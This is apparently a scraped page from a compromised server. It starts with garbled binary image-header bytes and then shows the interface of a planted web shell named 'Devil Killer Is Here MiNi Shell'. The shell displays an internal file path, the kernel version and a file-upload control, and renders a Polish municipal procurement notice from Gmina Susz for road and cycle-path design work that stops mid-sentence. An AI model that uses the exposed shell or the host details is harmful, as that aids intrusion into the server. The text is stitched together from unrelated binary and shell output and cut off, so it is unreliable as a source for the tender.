JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250917/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250917/0042744101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowych - III tura </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SUSZ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170748086</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Józefa Wybickiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Susz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">14-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">susz@susz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.susz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowych - III tura </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3dc644e0-c2a1-4027-afe3-ca2f4b5f911a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00427441</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00039503/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Wykonanie dokumentacji projektowej - Przebudowa ul. Leśnej w Suszu</p> <p class="mb-0">1.3.5 Wykonanie dokumentacji projektowej - Przebudowa ul. Magnolii w Suszu</p> <p class="mb-0">1.3.6 Wykonanie dokumentacji projektowej - Przebudowa Grabowiec - Piotrkowo</p> <p class="mb-0">1.3.7 Wykonanie dokumentacji projektowej - Budowa ścieżki pieszo rowerowej Dąbrówka - Różnowo</p> <p class="mb-0">1.3.8 Wykonanie dokumentacji projektowej - Przebudowa ul. Szewskiej i Kościuszki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://susz.logintrade.net/zapytania_email,209972,30acbc6ff8034551580d1d73d9b3958c.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio<br/>związane z postępowaniem o udzielenie zamówienia będą udostępniane na stronie internetowej:<br/>https://susz.logintrade.net/zapytania_email,209972,30acbc6ff8034551580d1d73d9b3958c.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W zakresie nieuregulowanym ustawą<br/>Pzp lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w<br/>szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy oraz<br/>rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie.<br/>2. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa w rozporządzeniu, składa się w formie<br/>elektronicznej, w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, w formie pisemnej lub w formie<br/>dokumentowej, w zakresie i w sposób określony w przepisach o których mowa w rozdziale XIV. pkt 9, 10 SWZ.<br/>3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt 1, składa<br/>każdy z wykonawców we własnym imieniu. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Szczegółowe informacje dotyczące wymagań technicznych i organizacyjnych zawarte są w treści rozdziału XIV SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE. L. z 2016<br/>r. Nr 119, str. 1 z późn. zm.; zwanym dalej „RODO”) informujemy, że: 1) administratorem Pani/Pana danych osobowych jest Gmina<br/>Susz, z siedzibą w Suszu przy ul. Józefa Wybickiego 6, 14-240 Susz, z którą można kontaktować się pisemnie na adres siedziby lub<br/>poprzez adres e-mail: susz@susz.pl lub telefonicznie pod nr 55 278 60 15.<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: inspektor@susz.pl<br/>. 3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym na podstawie art. 275 pkt 2 ustawy pzp.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy pzp. 5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 pzp przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy; 6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego. 7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO. 8) posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych<br/>osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora<br/>niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu<br/>albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia); b) na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników); c) na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego<br/>lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania<br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej<br/>osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); d)<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;9) nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e<br/>RODO prawo do usunięcia danych osobowych; b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; c)<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;10) przysługuje Pani/Panu prawo wniesienia skargi do organu<br/>nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPZ.II.271.23.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej – „Budowa ścieżki pieszo rowerowej Dąbrówka - Różnowo”<br/>Przedmiot zamówienia obejmuje opracowanie dokumentacji projektowej dla budowy ścieżki pieszo-rowerowej Dąbrówka-Różnowo.<br/>W zakres usługi wchodzi:<br/>1/ przygotowanie mapy do celów projektowych;<br/>2/ wykonanie inwentaryzacji budowlanej;<br/>3/ uzyskanie wszelkich koniecznych uzgodnień wymaganych prawem;<br/>4/ opracowanie projektu budowlanego wstępnego/ koncepcji do akceptacji przez Zamawiającego;<br/>5/ opracowanie projektu technicznego budowy ścieżki pieszo rowerowej Dąbrówka - Różno-wo;<br/>6/ wykonanie kosztorysu inwestorskiego z podziałem na branże – 1 egz. drukowany;<br/>7/ wykonanie kosztorysu inwestorskiego z zapisem elektronicznym na płycie CD – 1 egz.;<br/>8/ wykonanie przedmiaru robót do celów przetargowych z zapisem elektronicznym na płycie CD – 1 egz. z możliwością edycji;<br/>9/ dostarczenie płyty CD z zapisem dokumentacji wykonawczej w formacie PDF;<br/>10/ dostarczenie specyfikacji technicznego wykonania i odbioru robót – 1 egz. drukowany;<br/>11/ dostarczenie specyfikacji technicznego wykonania i odbioru robót na płycie CD;<br/>12/ uzyskanie decyzji pozwolenia na budowę lub zgłoszenia do Starostwa Powiatowego z zaświadczeniem o braku sprzeciwu organu administracyjno-budowlanego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71327000-6 - Usługi projektowania konstrukcji nośnych</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zasady oceny ofert w poszczególnych kryteriach: 1.1) W kryterium „Cena” (C)= cena najniższa brutto (spośród wszystkich złożonych ofert niepodlegających odrzuceniu) / cena brutto oferty badanej x 60 pkt. Porównywaną ceną będzie<br/>cena brutto ogółem za realizację zamówienia obliczonej przez Wykonawcę zgodnie z przepisami prawa i podanej w „Formularzu<br/>ofertowym” (załączniku nr 1 do SWZ). Określona w ten sposób cena oferty służyć będzie wyłącznie do porównania ofert i wyboru<br/>najkorzystniejszej oferty. 1.2) W kryterium „Okres rękojmi” (Or): Punkty za kryterium „Okres rękojmi” (Or) - zostaną przyznane<br/>zgodnie z poniższym opisem: a) Oferty w tym kryterium oceniane będą w odniesieniu do najdłuższego okresu rękojmi na wykonane<br/>prace projektowe zastrzegając, iż minimalny okres rękojmi wynosi 2 lata wg poniższego wzoru: 2 lata rękojmi - 0 punktów, 3 lata<br/>rękojmi - 10 punktów, 4 lata rękojmi - 20 punktów, 5 lat rękojmi - 30 punktów. b) Oferta z okresem rękojmi 5 lat i więcej – otrzyma<br/>maksymalną ilość punktów. Punkty zostaną przyznane na podstawie oświadczenia złożonego w pkt. 6 „Formularza ofertowego”<br/>(załącznik nr 1 do SWZ). Okres rękojmi należy podać w latach np. 2,3,4,5…itd. lat. 1.3) W kryterium „Aktualizacja kosztorysów<br/>inwestorskich” (Aki): Punkty za kryterium aktualizacja kosztorysów inwestorskich (Aki) - zostaną przyznane zgodnie z poniższym<br/>opisem: a) W ramach wynagrodzenia należnego Wykonawcy wymagane jest wykonanie co najmniej jednokrotnej aktualizacji<br/>kosztorysu inwestorskiego. Przez aktualizację zamawiający rozumie dokonanie aktualizacji cen zgodnie z wymogami art. 36 ust. 1<br/>ustawy Pzp, b) Za wykonanie dodatkowych aktualizacji kosztorysu inwestorskiego ponad wymagane minimum w okresie udzielonej<br/>rękojmi zostaną przyznane punkty w następujący sposób: za brak deklaracji (nie wpisanie w ogóle ilości aktualizacji lub wpisanie „0”)<br/>Wykonawcy w zakresie wykonania dodatkowych aktualizacji kosztorysu inwestorskiego ponad wymagane minimum – przyznane<br/>zostanie: 0 pkt.; za zadeklarowanie przez Wykonawcę wykonania 1 dodatkowej aktualizacji kosztorysów inwestorskich w okresie<br/>udzielonej rękojmi ponad wymagane minimum – przyznanych zostanie: 5 pkt.; za zadeklarowanie przez Wykonawcę wykonania 2 lub<br/>więcej dodatkowych aktualizacji kosztorysów inwestorskich w okresie udzielonej rękojmi ponad wymagane minimum – przyznanych<br/>zostanie: 10 pkt. Punkty zostaną przyznane na podstawie oświadczenia w pkt. 7 „Formularza ofertowego” (załącznik nr 1 do SWZ).<br/>Oferowana dodatkowa (ponad 1 obowiązkową) ilość bezpłatnych aktualizacji kosztorysów inwestorskich należy podać w liczbie np.<br/>0,1,2,3,…itd. 2. Ocenę oferty (Of) stanowi suma punktów określona dla poszczególnych kryteriów wg wzoru: Of= C + Or + Aki gdzie:<br/>Of- ilość punktów uzyskana przez ofertę badaną; C- ilość punktów uzyskana przez ofertę w kryterium cena; Or- ilość punktów<br/>uzyskana przez ofertę w kryterium okres rękojmi; Aki – ilość punktów uzyskana przez ofertę w kryterium aktualizacja kosztorysów<br/>inwestorskich. 3. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów tj. przedstawiająca<br/>najkorzystniejszy bilans kryteriów oceny ofert wg powyższego wzoru. Zamawiający może przyznać Wykonawcy maksymalnie 100<br/>punktów. 6. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans<br/>kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną. 7. Obliczenia dokonywane będą z<br/>dokładnością do dwóch miejsc po przecinku, z zachowaniem na-stępującej zasady: jeżeli parametr miejsca tysięcznego jest poniżej<br/>5 to parametr setny zaokrągla się w dół, jeżeli parametr miejsca tysięcznego jest 5 i powyżej to parametr setny zaokrągla się w górę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aktualizacja kosztorysów inwestorskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej dla zadania pod nazwą: „Przebudowa Grabowiec - Piotrkowo”<br/>Przedmiot zamówienia obejmuje opracowanie dokumentacji projektowej dla przebudowy/budowy jezdni Grabowiec - Piotrkowo. <br/>W zakres usługi wchodzi:<br/>1/ przygotowanie mapy do celów projektowych;<br/>2/ wykonanie inwentaryzacji budowlanej;<br/>3/ uzyskanie wszelkich koniecznych uzgodnień wymaganych prawem;<br/>4/ opracowanie projektu budowlanego wstępnego/ koncepcji do akceptacji przez Zamawiającego;<br/>5/ opracowanie projektu technicznego przebudowy drogi Grabowiec - Piotrkowo;<br/>6/ wykonanie kosztorysu inwestorskiego z podziałem na branże– 1 egz. drukowany;<br/>7/ wykonanie kosztorysu inwestorskiego z zapisem elektronicznym na płycie CD – 1 egz.;<br/>8/ wykonanie przedmiaru robót do celów przetargowych z zapisem elektronicznym na płycie CD – 1 egz. z możliwością edycji;<br/>9/ dostarczenie płyty CD z zapisem dokumentacji wykonawczej w formacie PDF;<br/>10/ dostarczenie specyfikacji technicznego wykonania i odbioru robót – 1 egz. drukowany;<br/>11/ dostarczenie specyfikacji technicznego wykonania i odbioru robót na płycie CD;<br/>12/ uzyskanie decyzji pozwolenia na budowę lub zgłoszenia do Starostwa Powiatowego z zaświadczeniem o braku sprzeciwu organu administracyjno-budowlanego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71327000-6 - Usługi projektowania konstrukcji nośnych</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zasady oceny ofert w poszczególnych kryteriach: 1.1) W kryterium „Cena” (C)= cena najniższa brutto (spośród wszystkich złożonych ofert niepodlegających odrzuceniu) / cena brutto oferty badanej x 60 pkt. Porównywaną ceną będzie<br/>cena brutto ogółem za realizację zamówienia obliczonej przez Wykonawcę zgodnie z przepisami prawa i podanej w „Formularzu<br/>ofertowym” (załączniku nr 1 do SWZ). Określona w ten sposób cena oferty służyć będzie wyłącznie do porównania ofert i wyboru<br/>najkorzystniejszej oferty. 1.2) W kryterium „Okres rękojmi” (Or): Punkty za kryterium „Okres rękojmi” (Or) - zostaną przyznane<br/>zgodnie z poniższym opisem: a) Oferty w tym kryterium oceniane będą w odniesieniu do najdłuższego okresu rękojmi na wykonane<br/>prace projektowe zastrzegając, iż minimalny okres rękojmi wynosi 2 lata wg poniższego wzoru: 2 lata rękojmi - 0 punktów, 3 